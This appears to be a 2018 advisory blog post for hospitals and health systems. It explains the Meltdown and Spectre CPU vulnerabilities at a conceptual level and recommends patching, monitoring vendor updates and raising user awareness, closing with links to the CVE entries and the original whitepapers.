Rumors of an undisclosed Central Processing Unit (CPU) hardware chip security issue have been circulating since November 2017. The security issue deals with two critical vulnerabilities known as “Meltdown and Spectre.” Now the rumors have been confirmed, and the reality is considerably worse than anticipated – which could have significant implications for hospitals and health systems.
The Threat, in a Scary Nutshell
Without getting too deep into the technical weeds, a CPU is typically working on the execution of multiple instructions at once to improve overall computer performance. However, the performance of the CPU is limited by its ability to access main memory. To speed that up, the CPU will execute instructions out of order in the event there is a memory cache miss. Out of order execution runs into a challenge whenever the code branches. The CPU cannot tell which branch the program will take, so it will make a guess based on past experience with the branch in question. This is known as branch prediction. Once the actual branch condition can be evaluated, the processor will determine whether it guessed right. If it guessed wrong, the executed instructions after the branch will be deleted, and everything will proceed as normal.
A branch prediction failure should only slow things down – but, with these two specific vulnerabilities, that’s not the case. Execution of predictive instructions can cause data to be loaded into the CPU cache. Attacks can then be invoked that can determine which instructions were executed. This means that the contents of the cache can be used as a covert channel to get data out of the CPU.
The major problem is the scale of the vulnerability – the CPU hardware is everywhere, from the depths of the cloud to the processor in your mobile phone, TV, and X-Box! Couple this with the ubiquitous connectivity that we all expect these days, and we have a very significant threat!
The general expectation is that, when a patch is available, it will have some impact on overall CPU performance (or, at the most extreme, it will require a re-architecting of the hardware), resulting in a need to replace CPU chips across the organization.
What Does this Mean for Healthcare Organizations?
With the myriad of devices, pumps, servers, and workstations in every healthcare organization, the threat is significant, to say the least. At this stage, it is critical to re-enforce a message to all users that security is of paramount importance. All users must be made aware of the risks of clicking on unknown links in emails and on web pages. Also, organizations need to update and patch all servers, workstations and other devices that have CPU chips, including biomedical devices, diagnostic equipment, treatment equipment, medical monitors, medical laboratory equipment, bedside terminals and environmental management systems, etc. – not just IT managed servers, printers, and workstations. Patching should also be evaluated against the performance needs of each device type. Users will need to be vigilant about password management. Passwords should be changed after patches are completed.
One long-term solution is to require that instruction set architectures be updated to include clear guidance about CPU security properties. Additionally, organizations should evaluate other systems that have Intel, ARM, or AMD CPUs for risk exposure and check with system vendors as to the applicability of the vulnerabilities and any available patches.
In the meantime, all system administrators and users need to increase their awareness of the threat potential and ensure they keep security front and center until resolution of these vulnerabilities is complete!
Quick Actions to Take Today
Based on what is known today, the quick actions every healthcare organization should perform or plan to execute in the very near future include:
- Actively monitor Operating System patch update websites, as patches are being released that address some of the vulnerabilities.
- Specifically monitor and test Meltdown patches being released by Microsoft, Apple, VMware, and various Linux sources for effectiveness and performance.
- Ensure anti-virus programs have the latest updates, as a specific registry key has to be set in order for Microsoft systems to receive updates.
- Actively engage with cloud service providers to confirm strategies for addressing these vulnerabilities and ensure the information provided meets expectations for action items and timeframes.
Spectre CVE CVE-2017-5753 – http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5753
Spectre CVE-2017-5715 – http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5715
Meltdown CVE-2017-5754 – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754
Original Spectre Whitepaper – https://spectreattack.com/spectre.pdf
Original Meltdown Whitepaper – https://meltdownattack.com/meltdown.pdf